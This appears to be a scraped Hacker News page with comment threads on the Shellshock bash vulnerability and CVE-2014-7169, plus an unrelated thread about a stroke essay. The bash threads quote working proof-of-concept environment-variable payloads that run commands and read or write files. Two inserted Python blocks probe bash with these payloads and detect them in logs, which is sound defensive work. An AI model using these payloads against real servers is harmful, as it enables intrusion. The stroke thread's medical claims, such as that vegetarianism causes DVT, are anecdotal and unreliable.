Looks like Raspbian has updated their bash package with the fix, so my Raspberry Pi is safe.
FranOntanaya 1 day ago 0 replies      
Saucy wasn't patched by the time I did a do-release-upgrade a while ago.
pbrumm 1 day ago 0 replies      
Don't forget to update your docker containers and restart them.
ck2 1 day ago 3 replies      
Has the redhat patch been pushed through centos yet?
peterwwillis 1 day ago 1 reply      
Know what isn't vulnerable to this? Perl CGI scripts with taint mode enabled. http://perldoc.perl.org/perlsec.html#Taint-mode

  You may not use data derived from outside your program to affect something else outside your program--at least, not by accident. All command line arguments, environment variables, locale information (see perllocale), results of certain system calls (readdir(), readlink(), the variable of shmread(), the messages returned by msgrcv(), the password, gcos and shell fields returned by the getpwxxx() calls), and all file input are marked as "tainted".

  Tainted data may not be used directly or indirectly in any command that invokes a sub-shell, nor in any command that modifies files, directories, or processes, with the following exceptions:

mmagin 1 day ago 0 replies      
The patch: ftp://ftp.cwru.edu/pub/bash/bash-4.3-patches/bash43-025
javert 1 day ago 3 replies      
So if a machine is not running a web server, does that mean that machine is not vulnerable?
piratebroadcast 1 day ago 1 reply      
Someone please ELI5 (Explain Like I'm 5)?
piratebroadcast 1 day ago 1 reply      
Free BashBleed logo for tech journalists - http://i.imgur.com/ilJbM74.png
zobzu 1 day ago 4 replies      
I have a feeling this is blown out of proportion. Who's running bash setuid exactly? Right. Who's running shell CGIs today? Right.

So.. who has an example of common scripts that are executed remotely in most servers while accepting remote environment? Til then, the panic seems unjustified...

I Had a Stroke at 33
597 points by Thevet  4 days ago   151 comments top 30
ohquu 4 days ago 2 replies      
What a beautiful article.

My girlfriend had three strokes, in succession, two years ago (when she was 22). The night before these strokes occurred, she had a transient ischemic attack (TIA). She began speaking gibberish to her friends. She texted me later that night explaining what happened. Her friends had laughed about it because they thought she was just acting like a goofball. I had no idea these were signs of a TIA, but I told her that if it happened again she needed to go to the doctor immediately.

The next day, the right side of her body went numb. This time, she was around people who noticed something was wrong, and she was immediately rushed to the emergency room. By the next day, I had flown a thousand miles (from the location of my new job) to be with her. She couldn't remember many words. She couldn't read a clock. She did not know the answer to 3 + 0.

It turned out that, similar to the author of this article, clots had traveled through the hole in her heart and up to her brain. Luckily, she recovered fully and was back to her old self within about a month. She had surgery to fix the PFO a couple months later. The neurologist told her that nine times out of ten, the clot travels a different path, and the victim is left dead or braindead. I am so lucky. Writing about this has me in big tears.

I am going to stop writing and go hug her now.

weddpros 4 days ago 5 replies      
I was 32 when I had a stroke (March 4th, 2003). It was a different kind of stroke, affecting a different part of my brain, essentially related to vision. I was half blind, but I only realized something was "strange" when I saw myself in the mirror: I had only one eye. My brain knew I should have two: I was half blind.

The first diagnosis was migraine with aura (blindness in my case). But the aura should have lasted no more than an hour. Two days later, the aura (blindness) was still there (a sign of infarct but my doctor didn't know it).

I spent 2 days alone in the dark. I forgot to eat but I knew I had to call a taxi to take me to the hospital. I wasn't scared, I thought it was just a migraine. It really looked and felt like my usual migraines. So my doctor had me take anti-migraine pills, which are vasoconstrictors. That might have caused the actual stroke: extreme vasoconstriction. Never take anti-migraine treatment during the aura. Never.

It took 2 days before I was diagnosed at the hospital, but they just told me "I see a shadow on the CT scan"... so I spent the next 2 days wondering what kind of shadow? stroke or cancer? And no, I didn't think about asking.

It took one week to be hospitalized for 10 days (my mother called the hospital, harassed them until she could talk to a doctor, who said it was an emergency... one week after the stroke).

It took 15 days before I woke up in the morning and thought "Wow! WOW! I'm back now!". Before that, I spent most of my time sleeping, reading half a page between two naps. I was sleeping more than I was awake.

It took 3 months before I could look at everything I wanted. Before that, looking at trees (and other complex objects) was "painful", and watching movies was too exhausting (especially action movies). During these 3 months, I recovered from blindness, but not completely. I still have a blind spot in my field of view today.

It took 6 months before my mood was really restored. Before that, I needed a daily nap, lots of soothing music, and no pressure at all.

I took aspirin daily for 3 years, after which my neurologist told me I could stop.

I had a few migraines after that, and even ended under oxygen at the hospital once, but I always recovered within 15 days.

It was 10 years ago, and it changed my life. I quit my job as a developer, spent 2 years wondering what to do next, then became a wedding photographer. In February this year, almost 10 years after, I got a new job as a developer.

I'm back on rails (node.js to be precise :-)

tucaz 4 days ago 1 reply      
About 15 years ago my father had a stroke at our house. I was about 12 years old and at home at the time along with my grandmother. We didn't know what was happening. At one second he was okay and in another he was on the floor. It was almost impossible to put him back in bed even with the help of one of our tenants.

We called my mother at work and the funny thing is that before she came home to take him to the ER he was able to ask for coffee (and drink it) and also to smoke a cigarette.

Moving 15 years forward he's still with us (62 years old) with no movement at all on the left side of his body. Had a heart attack with major surgery, is on more than 15 different medications, has diabetes and a bunch of other "minor problems".

My mother gave up her life to take care of him and everyday is a struggle because of the existing problems prior to the stroke and the ones that came after he became bitter and really mean to those who love and take care of him.

I'm not sure why I wrote about this but I felt like sharing. It's not easy when people don't recover, but for some reason I believe we have to take care of them and do our part.

ZeroCoin 4 days ago 1 reply      
>I wandered outside the boundaries of telemetry. They lost my heartbeat. When I returned, they scolded me.

The audacity of health care industry workers (those who should know what a certain disease entails) who place blame on their patients for acting normally is infuriating.

I had kidney stones once at a young age. I remember barely walking into the emergency room one night after they became too painful.

As soon as I arrived, white as a sheet of paper, they asked me a few questions... doped me up on morphine... and managed to "lose" me on a gurney in a hallway somewhere for a few hours until my girlfriend at the time came and found me.

They took xrays I believe and I was free to go with some more painkillers in hand.

Apparently the hospital told me that I was supposed to call them by X date if I wanted any more painkillers.

I called them back about a week after that date had passed, asked for a refill, and was scolded like I was some drug addict just looking for a fix. I think they even hung up on me. How could I be so stupid as to have forgotten a date they told me when I was high as a kite by their own doing? Right.

I ended up passing them without any painkillers which as many of you have probably heard is unbelievably painful.

I understand that it can get monotonous working in a hospital, but with the amount of money they're paid to work there you would hope that they would be required to operate with a little compassion. Considering the fact that many people in a hospital are leaving this world.

What if the author's last memory was that of a person she didn't know berating her for something she wasn't sure she even did?

TAM_cmlx 3 days ago 1 reply      
Two years ago this October I was homeless. I would wander around all night for fear of attacks[1] and try to sleep during the day at the university while sitting on a bench or chair. In October the winter shelters had not yet opened here, and it was so cold I feared I would freeze to death. I wandered into ER on a pretext: there was a swelling in my leg, spider bite maybe?

I overheard the intake person talking with someone: "I'm worried about that guy in #68." Why? "He thinks he's got a spider bite, but he's got blood clot written all over him."

I felt pretty good about that; it meant I'd have a place to sleep for a whole night. Then I was suddenly surrounded by 5 or 6 people.

Symptoms, sir?

Sometimes slurred speech, tingling in the extremities, can't spell anymore, confused by the way people talk so _fast_, confused by simple things, excessively paranoid, feels like there's an Ace bandage wrapped around my chest.

You're a junkie. No. You're exclusively vegetarian. No. You're diabetic. No, I've been tested for that. Well, we'll take a blood draw.

I got an ultrasound over my legs -- and they discovered a DVT. Next thing I knew, they'd slapped me in hospital for eight days. I was put on no less than eight medications, the scariest of which was Coumadin (same as Warfarin, I think?) -- scary because they made me watch a video describing it, by which I mean "You follow these instructions to the letter or you gonna die, son." At least that's what it felt like. And I had to sign all kinds of waivers, or something. Two of the residents (very young women) told me that they had had DVT's themselves... possibly as a result of being exclusively vegetarian?

The diagnosis was: Pernicious Anemia. My understanding (which is not to be trusted) is that the myelin sheathing around my nerves has been dissolving for years. Apparently the communicating tissue between the axons in my brain had been going away for quite some time.

I liked this diagnosis because: it's easily treatable; it explains my increasingly weird behavior; I'm not dead from it.

The treatment is: Take B12 every day for the rest of my life.

The highly-abbreviated coda to the story is: My doctor told me I'd had this disease for at least ten years(!); the hospital got me a case manager, who got me Disability, Homed, and a Laptop. But it took 2 years or so.

TLDR: Being exclusively vegetarian can cause DVT's


huhtenberg 4 days ago 8 replies      
Remember this -

  You have FOUR HOURS to get a person with a stroke to the emergency. 
If you do, their chances of survival are dramatically higher.

patio11 4 days ago 2 replies      
My mother had a stroke. The fallout is very, very hard for the patient and their family.

Diet and exercise are, apparently, the easiest levers you have to control for stroke risk. Trust me: this is the best of all possible reasons to care about those. You do not want to go through it and you do not want your family to go through it. Specifics elided for privacy but suffice it to say that it combined elements of a heart attack, advanced Alzheimer's, and a profound war injury in a compact package that arrived on a normal sunny Tuesday.

pragone 4 days ago 0 replies      
Strokes can present in truly any number of ways. The Cincinnati Stroke Scale, often seen in public health campaigns as "FAST", provides three simple, quick assessments that can reliably delineate a majority of strokes. It is the standard for basic EMTs as well. More advanced providers should perform a more comprehensive exam, testing all the cranial nerves (actually usually just II through XII). A more formalized, advanced stroke scale is the NIH stroke scale: http://stroke.nih.gov/documents/NIH_Stroke_Scale.pdf

While there is often some kind of neurologic deficit associated with a stroke, the gold standard is, of course, a CT or CTA that should be administered immediately upon arrival in the ED of a suspected stroke (depending on the presentation of symptoms an exam by a neurologist may occur first).

The symptoms described in this story would absolutely make me think this person was having a stroke if she had verbalized them to someone with my training.

It's also worthwhile to point out that the person having a stroke may not realize they are having a stroke. People may have the obvious symptoms - slurred speech and hemiparesis - and refuse to acknowledge that these problems exist, because, in their mind, they don't.

If you think someone is having a stroke, record the time you first noticed symptoms and call 911 immediately.

day_ 4 days ago 0 replies      
Great article.

I had a stroke one night in my 20's. When I woke up, my right side was numb (I thought I just slept on my arm), I spoke gibberish and was unable to write but I felt fine and I thought I spoke perfectly fine. I finally figured out that something was not right when I tried to write a message to my mom on the back of an envelope to tell her that I was fine and I just drew a straight line instead of letters. That's when she called an ambulance.

Luckily I was back to normal within a month, but I struggled for some time to find the right words when talking.

tluyben2 3 days ago 1 reply      
I had a TIA when I was 28 (over 10 years ago) and under heavy stress (high blood pressure; they did not find any other causes; I was healthy as I could be, just extreme stress from my own business at that time); I swore after that to never be stressed again (and took measures to make sure that is possible, like living in southern Spain for large parts of the year) and haven't been since. I even forgot how it felt. My life is so much better that I now thank this TIA. Stress is pure hell and whatever business people think they get out of it; it's bullshit IMHO; I have had way more business success than ever without stress than I had with.
alexitosrv 4 days ago 0 replies      
Four weeks ago my girlfriend, 32 yo, had a brain stroke because of a deep venous thrombosis on the left side of her head. It was intense to see how much she deteriorated in the course of just a few hours, starting with a seizure and some very acute headaches she had together with vomiting the previous days. We were in intensive care around 10 days, and then 3 days more in hospitalization. The investigation of her tendency to hypercoagulate yielded as main culprits sedentarism and the previous uninterrupted usage of oral contraceptives (mercilon) for almost ten years. We were fortunate in some sense as the cause was easy to point out and also as we discarded autoimmune diseases (my biggest concern) and now she is under low molecular weight heparin, hoping that the clot is reabsorbed in two or three months.

As part of the recovery, I'm reading to her My Stroke of Hindsight, by Jill Bolte Taylor, and her symptoms and the description of the episode of the acute phase match largely: speech loss, paralysis of her right part of the body and rational disconnect with external stimuli.

This article highlights also how sensitive we are to the changes of what we are at the end: physicochemical interactions. I was worried my girlfriend would lose her essence, but thanks to God her recovery has been amazing so far.

treehau5 4 days ago 0 replies      
I am not sure if you are the OP or know her, but this story touched my heart. It is beautiful. I can only imagine how strong she has to be, and the people around her must be, to get through this. My sister and her husband are going through the very same thing -- He was progressing very well in his career and they just had their first child when he suffered his from the same cause - a hole in the heart. All the best. You and all the stroke victims have my prayers tonight.
pimentel 4 days ago 1 reply      
All the stories I know and heard of stroke victims in their 30's or 40's make me think and ask: is there really a way to prevent or predict a stroke?

Would the "controversial routine full body scan" help? Especially for people who have a parent who was an early stroke victim?

These things are scary as hell...

skizm 4 days ago 2 replies      
Remember FAST: http://en.wikipedia.org/wiki/FAST_(stroke)

First 3 minutes of the house episode Fetal Position (S3 E17) demonstrate it.

Pxtl 3 days ago 1 reply      
> Each night, I took the box of Lovenox syringes and carried it to my husband, sobbing. It's time for my shot, I said, tears streaming down my face.

> Each night, he pinched skin on my belly as I screamed like a toddler and he injected the medicine.

Her husband sounds like an awesome guy - taking care of her in that state sounds incredibly difficult.

> My husband and I decided to get a divorce.

> I think in hindsight, it was your stroke that changed everything for me, he said.

> I thought it was the affair he'd had. But maybe he had a point. Maybe that was the year, I said.


camperman 4 days ago 1 reply      
Her memory experience was already reminding me of Leonard in Memento and then she writes, "it's time for my shot." That hit me unreasonably hard.
spindritf 4 days ago 3 replies      
Well, I just popped an Aspirin for no reason.
GuiA 4 days ago 3 replies      
Will smartwatches with heart rate/other health sensors be able to detect strokes right when they happen? Or maybe even slightly before they do?
glxc 3 days ago 0 replies      
This is an amazing article and incredible blog

Among many interesting and inspiring themes, of interest to the HN community may be the disassociation of vision and objects. All of the deep learning models succeeding in classification emulate one side of the brain, while perspectives like this present life outside the constraint of rational thinking.

cell303 4 days ago 0 replies      
I was terrified after reading this. Reminded me that I should live a bit healthier, not drink more coffee than water, go to sleep earlier, wake up earlier, maybe even exercise. But more important, it got me thinking. The non-routine kind of thinking. Read some old diary entries. Wrote a new one, after almost a year.
jlavarj 3 days ago 0 replies      
My wife had a stroke at the age of 30, seven years ago. It happened in the hospital during an embolization procedure. She was unconscious for 5 days. This event has obviously changed her life, but I wasn't prepared for the ways it would change mine. Thank you for sharing this.
delackner 3 days ago 0 replies      
Profound. Thank you for sharing this. It pains me to read though that you had years of abnormal symptoms (severe shortness of breath, migraines, etc) and the medical system was unable to detect the issue early. This seems like the sort of issue that early detection could provide tremendous quality of life / survivability improvements at little risk. If the existing tests are too difficult, then we need more tests.
taybin 3 days ago 0 replies      
This was on buzzfeed?? Crazy. Didn't think those soul-less bottom-feeders would turn to quality long-form essays.
yousifa 3 days ago 0 replies      
This is the best piece I have read in a while. It is amazing how something so small could affect our life. We are so delicate. Do you actually see objects as shapes and colors (as in, was the part of the brain that translates the signal into images lost) or was that you can not figure out what it is that you are looking at?
dgorges 3 days ago 0 replies      
There is a similar TED Talk worth watching:

Jill Bolte Taylor: My stroke of insight

http://www.ted.com/talks/jill_bolte_taylor_s_powerful_stroke... (18:19 min, Feb 2008)

nikant 3 days ago 0 replies      
Such a well written article. I loved the details with which the incident was described.
bshimmin 4 days ago 3 replies      
I wish Buzzfeed only had articles like this.
diestl 4 days ago 4 replies      
Not sure what this has got to do with programming?
ozy23378 3 days ago 3 replies      
> As a result, my left brain, the expert at numbers and language and logic and reasoning, a part of it suffocated and died. My right brain, the specialist with regard to color, music, creativity, intuition, and emotions, therefore could not talk to my left brain.

This popular myth of broad specialization of the hemispheres needs to die. The author lost credibility there.

CVE-2014-7169: Bash Fix Incomplete, Still Exploitable
543 points by caust1c  1 day ago   208 comments top 44
mdeslaur 19 hours ago 5 replies      
Proposed patch for CVE-2014-7169 here:


I am building bash updates for Ubuntu containing the proposed fix here and will publish them once the fix has been made official:


daveloyall 10 hours ago 3 replies      
All this "echo date, cat echo" business is confusing.

Let me fix that for you.

    hobbes@metalbaby:~$ export badvar='() { (a)=>\'
    hobbes@metalbaby:~$ bash -c "somestring executeMe"
    bash: badvar: line 1: syntax error near unexpected token `='
    bash: badvar: line 1: `'
    bash: error importing function definition for `badvar'
    bash: executeMe: command not found
    hobbes@metalbaby:~$ cat somestring  #it exists but is empty.
    hobbes@metalbaby:~$ bash -c "somestring date"
    bash: badvar: line 1: syntax error near unexpected token `='
    bash: badvar: line 1: `'
    bash: error importing function definition for `badvar'
    hobbes@metalbaby:~$ cat somestring
    Thu Sep 25 11:01:35 CDT 2014
    hobbes@metalbaby:~$ bash -c "somestring echo hello"
    bash: badvar: line 1: syntax error near unexpected token `='
    bash: badvar: line 1: `'
    bash: error importing function definition for `badvar'
    hobbes@metalbaby:~$ cat somestring
    hello
Gititgotitgood? Great. Now how the heck does anybody think that is as bad as the first one?

For this one, an attacker needs to control both the environment AND the command line of the child shell.

People, if those criteria are met, the attacker wins, with or without bugs.

Yes, yes, there are situations where the attacker has partial control of the command line via a filename argument or whatever--whatever indeed! That's not even in the same category as the first bug.

jimrandomh 1 day ago 4 replies      
With the patched bash, if you run

    env X='() { (a)=>\' sh -c "echo date"
This is equivalent to running

    date >echo
That is, you can put something in the environment which causes it to drop the first token, run the result as a command, and redirect the result to the dropped first token.

An example of a context where this would be exploitable, is a CGI webapp which accepts an uploaded zip file, stores it in a FAT filesystem, and and runs system("unzip /path/to/file"). Then putting a corrupt string in a header would cause the file to be executed, rather than unzipped.

danielweber 23 hours ago 1 reply      
Earlier on a mailing list someone pointed out that there is still an awful lot of string processing going on by bash even after this afternoon's fix. So further bugs were likely to be found now that everyone is constantly sniffing around the place.
ambrop7 19 hours ago 3 replies      
Can someone explain why bash is evaluating and looking for function definitions in every environment variable? What would be broken if this entire "feature", whatever it is, was completely disabled?

That's almost like a C compiler looking for C programs in string literals. It just doesn't make sense to me.

billpg 17 hours ago 0 replies      
Am I reading this right? If a string starts with the characters '() {', it is handled differently by the interpreter?

What am I meant to do if I actually want to store the characters '() {' in a string?

jewel 23 hours ago 6 replies      
What tools are people using to track and push out security updates, if any? Right now I only have a few servers to administer so apticron is sufficient for notification and upgrading isn't a burden.

Also, does anyone have a way to push out patched packages fast? Imagine that a patch is available, or it's trivial to remove a feature that you're not using, but the distribution hasn't made a package yet. I have been dreaming of making a system to help debian users create and manage a local set of packages, but haven't really had a chance to take it to a point where it'd be helpful in this scenario.

My extended thoughts on the matter: http://stevenjewel.com/2013/10/hacking-open-source/

fyrabanks 21 hours ago 0 replies      
Welp, I'm about to take a hammer to all of my data centers and get busy, then move deep into the woods. Good luck to everybody else who decides to leave their equipment functioning; it was nice knowing you.
timv 23 hours ago 2 replies      
Reproduced from my comment on the discussion of the previous CVE

The same trick can be used to read files as well

  $ date -u > file1
  $ env -i X='() { (a)=<\' bash -c 'file1 cat'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  Thu Sep 25 02:14:30 UTC 2014
Though obviously it's going to be trickier to find a system that issues commands in a way that can act as a path for that sort of exploit.
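
A check that reproduces the two test vectors posted in these threads against a given bash binary: super_mario's and snissn's `echo vulnerable` probe for CVE-2014-6271, and jimrandomh's and timv's `(a)=>\` / `(a)=<\` parser-state probe for CVE-2014-7169. This is an added example, not code from the thread or from the bash project. It assumes a POSIX host with `bash` on PATH (the path can be overridden), and it runs the 7169 probe inside a scratch directory so that the telltale `echo` file, if the build is affected, is created somewhere harmless.

```python
"""Probe a bash binary for CVE-2014-6271 and the CVE-2014-7169 follow-up.

Added example, not from the thread or from the bash project.  Uses the
thread's own test vectors; assumes a POSIX host and runs everything in a
throwaway directory so the 7169 probe's file creation stays contained.
"""
import os
import subprocess
import tempfile
from typing import Dict, Optional


def _run(bash: str, name: str, payload: str, command: str, cwd: str) -> subprocess.CompletedProcess:
    """Run `bash -c command` with one crafted variable in an otherwise minimal env."""
    env = {"PATH": os.environ.get("PATH", "/usr/bin:/bin"), name: payload}
    return subprocess.run([bash, "-c", command], env=env, cwd=cwd,
                          capture_output=True, text=True, timeout=10)


def classify_6271(stdout: str) -> bool:
    """The marker line appears only if the trailing command ran at import time."""
    return "vulnerable" in stdout.splitlines()


def check_cve_2014_6271(bash: str = "bash") -> Optional[bool]:
    """x='() { :;}; echo vulnerable' bash -c "echo this is a test"

    Returns True (vulnerable), False (patched) or None (no such binary).
    """
    try:
        with tempfile.TemporaryDirectory() as d:
            r = _run(bash, "x", "() { :;}; echo vulnerable", "echo this is a test", d)
    except FileNotFoundError:
        return None
    return classify_6271(r.stdout)


def check_cve_2014_7169(bash: str = "bash") -> Optional[bool]:
    """X='() { (a)=>\\' bash -c "echo date"

    On an affected build the leftover parser state turns the command into
    `date >echo`, so a file named `echo` appears in the working directory.
    """
    try:
        with tempfile.TemporaryDirectory() as d:
            _run(bash, "X", "() { (a)=>\\", "echo date", d)
            return os.path.exists(os.path.join(d, "echo"))
    except FileNotFoundError:
        return None


def report(bash: str = "bash") -> Dict[str, Optional[bool]]:
    """Both probes, keyed by CVE id."""
    return {
        "CVE-2014-6271": check_cve_2014_6271(bash),
        "CVE-2014-7169": check_cve_2014_7169(bash),
    }


if __name__ == "__main__":
    labels = {True: "VULNERABLE", False: "not vulnerable", None: "bash not found"}
    for cve, status in report().items():
        print(f"{cve}: {labels[status]}")
```

Point `report("/path/to/bash")` at a freshly built binary to confirm a backport before rolling it out; the 7169 probe checks for the side effect (the created file) rather than parsing stderr, since the "error importing function definition" messages appear on both patched and affected builds.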

schrodingersCat 11 hours ago 2 replies      
A little off topic, but am I still vulnerable?

I'm running OSX Mavericks 10.9.5, use zsh as my default shell, and have a patched version of bash built from the homebrew repo set as secondary in /etc/shells (on the occasion I need bash, I like to have completions). System bash is still vulnerable. With my current configuration, how worried should I be?

Any insight is appreciated!

jvreeland 20 hours ago 1 reply      
Does anyone know what Apples policy on fixing this might be? I understand why they ship with an older version of bash and other GNU userspace tools but is there a precedent they've set for backporting?
Erwin 18 hours ago 1 reply      
RHEL made a C shared object available that you can preload in everything which cleans up the environment of the magic "() {" bit: https://access.redhat.com/articles/1200223 (and apparently exactly that sequence has magic meaning; "( ) {" does not work)

For CGI scripts, only putting it in /etc/ld.so.preload worked for me. It seems like the CGI environment has LD_PRELOAD stripped (I checked /proc/apache_pid/environ which has LD_PRELOAD, but the CGI script running does not).

owenfi 18 hours ago 3 replies      
The exploit worked against my cgi perl scripts as well!

I had cgi-bin/update.pl running on OS X and I exploited it as mentioned here: https://twitter.com/hernano/status/514866681530023936

My perl scripts call $out = `git pull`, log to a file, and print a response; I was quite surprised the exploit worked against them. Promptly disabled, upgraded bash, and re-enabled, now disabling all cgi for a bit longer.

What are the common vectors beyond CGI-space for the average server? How do we find and test them?

userbinator 20 hours ago 1 reply      
It looks like the important part of the patch (bash43-025) is here:

In builtins/evalstring.c:

    if ((flags & SEVAL_FUNCDEF) && command->type != cm_function_def)
In variables.c:

    parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST|SEVAL_FUNCDEF|SEVAL_ONECMD);
So what the patch does is create a special mode of parse_and_execute() where it's supposed to only evaluate function definitions. A better option would be to add a flag to parse_and_execute() that disables it from attempting any execution completely, not just function definitions.

jtchang 23 hours ago 1 reply      
I'm starting to see automated attack attempts using HTTP_HOST headers set to '() {'.
deckiedan 20 hours ago 3 replies      
OK - so assuming that there isn't going to be a single patch which fixes all possible / related bugs any time soon.

- Change /bin/sh to something else. (CentOS has BASH as default, alas...)
- Filter out unknown, or suspicious looking HTTP vars / env vars at varnish/apache/nginx level, somehow... (doesn't stop other services)
- Figure out some clever SELinux configuration that blocks it.

I wonder how much would fail on switching out BASH as default sh?

fixtafernback 1 hour ago 0 replies      
Say I have a Perl CGI script that interfaces with ffmpeg and imagemagick with backtick operators. Am I vulnerable by default? Is there anything I can do to protect myself other than take them offline?
kalleboo 16 hours ago 1 reply      
I've been trying to exploit our own systems which have PHP web frontends running under apache/mod_php, and in my testing PHP isn't passing through any HTTP_* environment variables at all in calls to system() or exec().

Even just echoing back the result of "env" it doesn't look like I get anything user-supplied whatsoever in there (no HTTP_*)

Can anyone more knowledgeable confirm what I've seen?

songgao 23 hours ago 3 replies      
OK two questions:

1. Does zsh (or other shells) also have this kind of string processing where bugs are likely?

2. Is there a way to completely remove bash from the system and use zsh (or other shells) instead?

forgery-- 23 hours ago 1 reply      
Another PoC:

env -i X='() { (a)=>\' bash -c 'echo curl -s https://bugzilla.redhat.com/'; head echo

Creates file called echo and outputs the contents using head.

(from https://bugzilla.redhat.com/show_bug.cgi?id=1141597#c24)

annnnd 16 hours ago 2 replies      
It is curious to see how bash is mentioned everywhere, while the real culprit is the interaction between some web server and bash. Seriously, polluting ENV with HTTP headers? Admins should at least be able to block this.

It should be possible to mitigate this attack (and many similar) by better header values parsing (in Apache/nginx/... - maybe in some proxy?). For instance, Content-Type header can only include alphanumeric chars + slashes. Most of the other headers are similar. User-Agent is free-form, but there is no need to pass it to ENV (and it could be sanitized to only include alphanumeric chars and spaces).

Any idea, are web server maintainers working on this?
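Added example (not from any commenter above, nor from Red Hat's preload or any web server): Python code that does the two defensive things raised in this thread, flagging the `() {` probes jtchang reports in web server logs, and scrubbing a CGI child's environment the way Erwin describes, i.e. dropping only values that begin with the exact `() {` sequence bash imports. The log lines and header values are constructed samples; the Apache combined log layout and the RFC 5737 addresses are assumptions.

```python
import re

# bash imports an environment value as a function only when it starts with
# exactly "() {" (as Erwin notes, "( ) {" does not trigger it), so the scrub
# mirrors that strict prefix check.
FUNCTION_PREFIX = "() {"

# Detection in logs is deliberately looser so padded variants are still flagged.
PROBE_RE = re.compile(r"\(\)\s*\{")

# Apache "combined" log format; the three quoted fields carry client-controlled text.
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

# Constructed sample log lines (documentation addresses), using only the probe
# strings already quoted in this thread.
SAMPLE_LOG = [
    '203.0.113.7 - - [25/Sep/2014:10:00:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"-" "() { :;}; echo vulnerable"',
    '198.51.100.9 - - [25/Sep/2014:10:00:02 +0000] "GET / HTTP/1.1" 200 2048 '
    '"-" "Mozilla/5.0 (compatible; example)"',
    '203.0.113.8 - - [25/Sep/2014:10:00:03 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 '
    '"() { (a)=>\\" "curl/7.30.0"',
]


def scrub_environment(env):
    """Return a copy of env without any value bash would import as a function."""
    return {k: v for k, v in env.items() if not v.startswith(FUNCTION_PREFIX)}


def find_probes(lines):
    """Return (client ip, field, value) for every log line carrying a probe."""
    hits = []
    for line in lines:
        m = COMBINED_RE.match(line)
        if m is None:
            # Unknown layout: still flag the raw line rather than let it slip past.
            if PROBE_RE.search(line):
                hits.append(("?", "raw", line))
            continue
        for field in ("request", "referer", "agent"):
            if PROBE_RE.search(m.group(field)):
                hits.append((m.group("ip"), field, m.group(field)))
                break
    return hits


def cgi_environment(request_headers, base_env):
    """Build the HTTP_* environment a CGI child would get, scrubbed before any shell sees it."""
    env = dict(base_env)
    for name, value in request_headers.items():
        env["HTTP_" + name.upper().replace("-", "_")] = value
    return scrub_environment(env)


if __name__ == "__main__":
    for ip, field, value in find_probes(SAMPLE_LOG):
        print(f"probe from {ip} in {field}: {value!r}")
    print(cgi_environment({"User-Agent": "() { :;}; echo vulnerable"}, {"PATH": "/bin"}))
```

The scrub is a stop-gap that only covers children launched through code you control; it does nothing for a system bash reached some other way, which is why patching bash itself still comes first.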

milankragujevic 9 hours ago 1 reply      
Here is a simple little tool to check if your website is vulnerable http://milankragujevic.com/projects/shellshock/
someguy222 18 hours ago 0 replies      
I found some exploit probes from a server called datacards.org. Happened on a server located in Germany. It's some kind of personal data gathering system (National Defense University DataCards)

Should be limited to Afghanistan and stuff

WestCoastJustin 1 day ago 1 reply      
Appears to work, even with latest patches, by using sh (from the link):

  $ env X='() { (a)=>\' sh -c "echo date"; cat echo
  date
  Wed Sep 24 15:00:34 PDT 2014

  -- previous bug fix for bash (before/after patch) --

  $ x='() { :;}; echo vulnerable' bash -c 'echo test'
  vulnerable
  test
  $ x='() { :;}; echo vulnerable' bash -c 'echo test'
  bash: warning: x: ignoring function definition attempt
  bash: error importing function definition for `x'
  test
Tested on Ubuntu 14.04.1 LTS & Debian GNU/Linux 7.0 (wheezy) with latest patches.

ps. lots of chatter about the original issue @ https://news.ycombinator.com/item?id=8361574

Pyppe 14 hours ago 2 replies      
Stumbled upon https://gist.github.com/anonymous/929d622f3b36b00c0be1

Just to verify; apache httpd / nginx without CGI-support is not vulnerable?

drtse4 13 hours ago 0 replies      
Link to the vulnerability report for Debian if someone needs it: https://security-tracker.debian.org/tracker/CVE-2014-7169
lovelearning 20 hours ago 1 reply      
I'd like to check if my home router is vulnerable to this over HTTP or DHCP or SSH. Is there any tool I can use, like the heartbleed folks had?

My router runs DD-WRT (an old version which I can't upgrade), has an administration web page and has ssh access enabled. It does not have remote web administration enabled. Any tips?

reidrac 14 hours ago 0 replies      
Ubuntu Trusty's patched version 4.3 doesn't seem to be affected by this, but Precise version still is (4.2; same one as in Debian).

Is this new exploit version dependent?

mdaniel 21 hours ago 1 reply      
Do I correctly understand that there were `expr 7169 - 6271` 898 potential (or is that confirmed?) vulnerabilities tracked in the few hours between those two mailing list messages?

If true, I never really comprehended the volume of vulnerabilities flying by every day.

IBM 20 hours ago 1 reply      
I can't imagine why people are so paranoid about the tech companies having backdoors (especially when they explicitly deny it) when the NSA or other intelligence agencies could have lots of unknown vulnerabilities to exploit.
tinix 14 hours ago 0 replies      
lol @ this: http://seclists.org/oss-sec/2014/q3/681

Soon someone will be suggesting that you have to add some random string to all of your env variables to make them work, otherwise they are ignored, like with CSRF mitigation.

Actually, I jest, but that's probably a good idea, anything running on the system could view some /tmp file with the string and append it to the env variable string or something, but any remote client wouldn't be able to access that.


passfree 15 hours ago 0 replies      
Hi everyone,

We just published this tool to test for Shellshock. https://suite.websecurify.com/market/shellshock

Do a scan over before it is too late.

rcthompson 19 hours ago 3 replies      
I run an Ubuntu server in my closet as a general-purpose file server and such, mostly just for my own use or for sending files to friends. I have just turned it off and disabled all port forwards to it, and I will wait at least a few days and check for a more definitive fix before opening it back up to the internet. I recommend anyone in a similar situation do the same.
moloch 1 day ago 2 replies      
PoC floating around:

rm -f echo && env -i X='() { (a)=>\' bash -c 'echo date'; cat echo

stalinone 18 hours ago 2 replies      
My solaris is default to tcsh but with bash installed, am I affected?
reedloden 18 hours ago 0 replies      
If it's truly unused, you should be using /bin/false instead of /bin/sh. Note that /bin/sh is not always dash in many cases, so just because you are using /bin/sh over /bin/bash doesn't mean you're not vulnerable.
Athas 16 hours ago 0 replies      
Is this a problem even if /bin/sh is not bash? I'm pretty confused at why one would ever want /bin/sh to be bash (and not, say, dash). If you want bash, ask for it.
HaydenJames 22 hours ago 1 reply      
jMyles 1 day ago 0 replies      
I just tested on fully patched Ubuntu 14.04 - still vulnerable per this method.
limsdims 14 hours ago 2 replies      
My Zsh seems vulnerable. Anyone else care to replicate this?

  ~ zsh --version
  zsh 5.0.2 (x86_64-apple-darwin13.0)
